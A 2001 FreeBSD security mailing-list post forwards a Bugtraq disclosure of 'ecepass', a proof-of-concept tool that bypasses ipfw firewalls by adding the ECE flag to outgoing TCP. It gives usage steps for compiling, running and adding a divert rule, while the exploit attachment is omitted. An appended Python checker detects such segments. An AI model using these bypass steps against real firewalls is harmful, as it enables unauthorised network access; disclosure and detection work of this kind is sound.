From owner-freebsd-security Mon Jan 29 8: 7:51 2001
Date: Mon, 29 Jan 2001 11:18:44 -0500 (COT)
From: Buliwyf McGraw
To: freebsd-security@FreeBSD.ORG
Subject: ecepass - proof of concept code for FreeBSD ipfw bypass (fwd)

Very interesting...

---------- Forwarded message ----------
Date: Thu, 25 Jan 2001 15:04:30 +0200
From: Roelof Temmingh
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: ecepass - proof of concept code for FreeBSD ipfw bypass

An all ZA production...;)

FreeBSD ipfw+ECE proof of concept code
--------------------------------------

Code written by: Plathond (jacques4i@yahoo.com) for Sensepost
(http://www.sensepost.com, info@sensepost.com)

More info on the problem:
http://packetstorm.securify.com/advisories/freebsd/FreeBSD-SA-01:08.ipfw

Original problem found by: Aragon Gouveia

How it works:
-------------
Using a FreeBSD divert rule, all outgoing traffic (or as specified in the
ipfw rule) will be diverted to the ecepass process - the ECE flag will be
added. Traffic directed to hosts behind an ipfw-based firewall will be
passed, rendering the firewall useless if it makes use of the "allow all
from any to any established" rule.
Tried & tested...

How to use:
-----------
1. Make sure your kernel is compiled with the following options:
   options IPDIVERT
   options IPFIREWALL
2. gcc -o ecepass ecepass.c
3. ./ecepass &
4. ipfw add 5 divert 7000 tcp from any to any
5. All TCP traffic will now have the ECE flag added to it.

PS1: obviously you need to make sure that the last ipfw rule allows
traffic, e.g.:
00001 divert 7000 tcp from any to any
65535 allow ip from any to any

PS2: as the exploit uses "ipfw divert" it only works on FreeBSD. Ironic eh?

spidermark: sensepostdata ece

Regards,
Roelof.

------------------------------------------------------
Roelof W Temmingh
SensePost IT security
roelof@sensepost.com
+27 83 448 6996
http://www.sensepost.com

Content-Type: APPLICATION/OCTET-STREAM; NAME="ecepass.tgz"
Content-Disposition: ATTACHMENT; FILENAME="ecepass.tgz"
[base64-encoded attachment body omitted]
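As an added detection-side example (not part of the forwarded post or of the ecepass code): a small Python checker that parses raw TCP headers from a capture and flags segments that carry ECE while lacking ACK and RST, which is the shape of traffic the technique above produces and which a flag-based "established" test should never pass. The ECN-setup exception (SYN with both ECE and CWR) and the sample headers are my own assumptions and constructed input.

```python
import struct

# TCP flag bits: low byte of the 16-bit data-offset/flags field (RFC 793, RFC 3168)
TH_FIN, TH_SYN, TH_RST, TH_PUSH, TH_ACK, TH_URG, TH_ECE, TH_CWR = (
    0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80)

def tcp_flags(segment: bytes) -> int:
    """Return the 8 flag bits from a raw TCP header (at least 20 bytes)."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    off_flags = struct.unpack("!H", segment[12:14])[0]
    return off_flags & 0xFF

def established_by_ack_or_rst(flags: int) -> bool:
    """What 'established' should mean: the segment belongs to a connection,
    i.e. ACK or RST is set. ECE (0x40) plays no part in that decision."""
    return bool(flags & (TH_ACK | TH_RST))

def looks_like_ece_bypass(flags: int) -> bool:
    """ECE set on a segment with neither ACK nor RST that is not an ECN-setup
    SYN (SYN+ECE+CWR). Such a segment cannot be part of an established
    connection; it is what ecepass-style flag rewriting produces.
    The ECN-setup exception is an assumption of this checker."""
    if not flags & TH_ECE:
        return False
    if established_by_ack_or_rst(flags):
        return False
    if flags & TH_SYN and flags & TH_CWR:
        return False
    return True

def build_header(flags: int, sport: int = 40000, dport: int = 22) -> bytes:
    """Constructed 20-byte TCP header (data offset 5, no options) for the sample."""
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0,
                       (5 << 12) | flags, 8192, 0, 0)

def scan(segments):
    """Return the indexes of segments that look like an ECE bypass attempt."""
    return [i for i, seg in enumerate(segments)
            if looks_like_ece_bypass(tcp_flags(seg))]

# Constructed sample "capture": plain SYN, ECN-setup SYN, data ACK, SYN with ECE added
SAMPLE = [
    build_header(TH_SYN),
    build_header(TH_SYN | TH_ECE | TH_CWR),
    build_header(TH_ACK | TH_PUSH),
    build_header(TH_SYN | TH_ECE),  # ecepass-style: connection setup carrying ECE
]

if __name__ == "__main__":
    print("suspicious segment indexes:", scan(SAMPLE))  # [3]
```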